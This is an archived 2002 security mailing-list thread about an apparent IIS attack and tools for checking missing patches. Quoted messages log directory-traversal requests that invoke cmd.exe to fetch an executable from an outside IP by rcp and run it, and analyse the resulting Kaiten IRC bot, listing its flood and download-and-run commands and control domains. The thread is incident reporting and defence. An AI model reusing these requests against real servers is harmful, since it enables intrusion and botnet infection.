Re: new IIS worm? (rcp lsass.exe)

From: zeno (bugtraqat_private)
Date: Tue Sep 24 2002 - 13:48:02 PDT

  • Next message: John Campbell: "RE: new IIS worm? (rcp lsass.exe)"

    > 
    > Shavlik makes HFNetChkLT (Freeware) and HFNetChk Pro.  These are GUI
    > versions of the command line version of HFNetChk.  I have found HFNetChkLT
    > to be a little cranky, but what can you expect for free.  It does do the
    > job.  You can check them out at www.shavlik.com.
    
    Ahhh I had only seen the command line tool. Thanks!
    I'll peek at it.
    
    - zeno
    
    
    > 
    > Dick Donovan
    > 
    > -----Original Message-----
    > From: zeno [mailto:bugtraqat_private]
    > Sent: Tuesday, September 24, 2002 2:29 PM
    > To: Mark Challender
    > Cc: 'pjat_private'; incidentsat_private
    > Subject: Re: new IIS worm? (rcp lsass.exe)
    > 
    > >
    > > Hardening of IIS with the tools available at Microsoft and using URLSCAN
    > > with the EXE blocking on will stop these attacks.
    > >
    > > Patch, patch, patch, recheck the patches and use URLSCAN!
    > 
    > Does anyone know of a gui windows tool that scans your system and provides
    > you with a list
    > of needed patches, and then allows you to select, and have it autodownload
    > and install them?
    > I can't seem to find one (needed mostly for iis).
    > 
    > - zenoat_private
    > 
    > 
    > 
    > >
    > > Mark Challender
    > > Network Administrator
    > >
    > > ==================
    > > Veni, Vidi, Geeki
    > > ==================
    > >
    > >
    > > -----Original Message-----
    > > From: pjat_private [mailto:pjat_private]
    > > Sent: Monday, September 23, 2002 3:27 AM
    > > To: incidentsat_private
    > > Subject: Re: new IIS worm? (rcp lsass.exe)
    > >
    > >
    > >
    > > Christian Mock:
    > >
    > > >Then it seems to go after the web servers, sending the following:
    > >
    > > >GET
    > >
    > /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+
    > > .
    > >  HTTP/1.0..
    > >
    > > >and
    > >
    > > >GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0
    > >
    > > >I've been able to get hold of that lsass.exe binary (9728 bytes), but
    > > >I lack the skills to analyze it; I'll happily mail it to anybody who
    > asks.
    > >
    > >
    > > We have seen this attack from 4 different sources since Sept. 16, and have
    > > informed the owner of 64.21.95.7 and downloaded the lsass.exe for
    > > investigation.
    > >
    > > Based on the attack rate this is most likely a scripted or manual attack,
    > > not a worm.
    > >
    > > Judging from  the embedded string in this compressed binary  it appears to
    > > be an IRC bot  based on the kaiten.c code written by contem@efnet, the
    > > author of the Slapper worm :
    > >
    > > Kaiten Win32 API version 2002 by contem@efnet
    > >
    > > The binary  contains these domainnames, most likeky IRC servers used for
    > > controlling the bot:
    > >
    > > telsa5.mine.nu (Korea)
    > > irc.logicfive.net (Taiwan)
    > > moncredo.shacknet.nu (USA)
    > > telsacredo.shacknet.nu (USA)
    > > lar.ath.cx (Taiwan)
    > >
    > > The program accepts commands to make various DOS attacks or download new
    > > version or executables with http:
    > >
    > > NOTICE %s :PUSH <target> <port> <secs>   = A push flooder
    > > NOTICE %s :TCP <target> <port> <secs>    = A syn flooder
    > > NOTICE %s :UDP <target> <port> <secs>    = A udp flooder
    > > NOTICE %s :MCON <target> <port> <times>  = A connectbomb flooder
    > > NOTICE %s :NICK <nick>                   = Changes the nick of the client
    > > NOTICE %s :DISABLE <pass>                = Disables all packeting from
    > this
    > > client
    > > NOTICE %s :ENABLE <pass>                 = Enables all packeting from this
    > > client
    > > NOTICE %s :UPDATE <http address>         = Downloads a file off the web
    > and
    > > updates the client
    > > NOTICE %s :RUN <http address>            = Downloads a file off the web
    > and
    > > runs it
    > > NOTICE %s :GET <http address>            = Downloads a file off the web
    > > NOTICE %s :ADDSERVER <server>            = Adds a server to the list
    > > NOTICE %s :DELSERVER <server>            = Deletes a server from the list
    > > NOTICE %s :LISTSERVERS                   = Lists server on the list
    > > NOTICE %s :KILL                          = Kills the client
    > > NOTICE %s :VERSION                       = Requests version of client
    > > NOTICE %s :HELP                          = Displays this
    > >
    > >
    > > There seems also to be a default account and password in the german
    > > language included in this specific version of Kaiten.
    > >
    > > The IIS attack that tries to inject this Trojan usually has another URL
    > > with "CONNECT chat.vtm.be:6667".  This is an attempt to proxy an connectio
    > n
    > > to port 6667(IRC) on chat.vtm.be.
    > >
    > >
    > >
    > > Peter Jelver
    > > ...
    > >
    > > eSec A/S
    > >
    > > http://www.esec.dk
    > >
    > ............................................................................
    > > .
    > >
    > > PGP Fingerprint : 47AF FFEC D48F 9C13 0C4F  E687 BB8A 128F D85C A7D7
    > >
    > >
    > >
    > >
    > >
    > > --------------------------------------------------------------------------
    > --
    > > This list is provided by the SecurityFocus ARIS analyzer service.
    > > For more information on this free incident handling, management
    > > and tracking system please see: http://aris.securityfocus.com
    > >
    > > --------------------------------------------------------------------------
    > --
    > > This list is provided by the SecurityFocus ARIS analyzer service.
    > > For more information on this free incident handling, management
    > > and tracking system please see: http://aris.securityfocus.com
    > >
    > >
    > 
    > 
    > ----------------------------------------------------------------------------
    > This list is provided by the SecurityFocus ARIS analyzer service.
    > For more information on this free incident handling, management
    > and tracking system please see: http://aris.securityfocus.com
    > 
    > 
    > Tracking #: A1322DD0D92E8D49A4C927CF6BB921396034F7E7
    > 
    > 
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Tue Sep 24 2002 - 19:34:50 PDT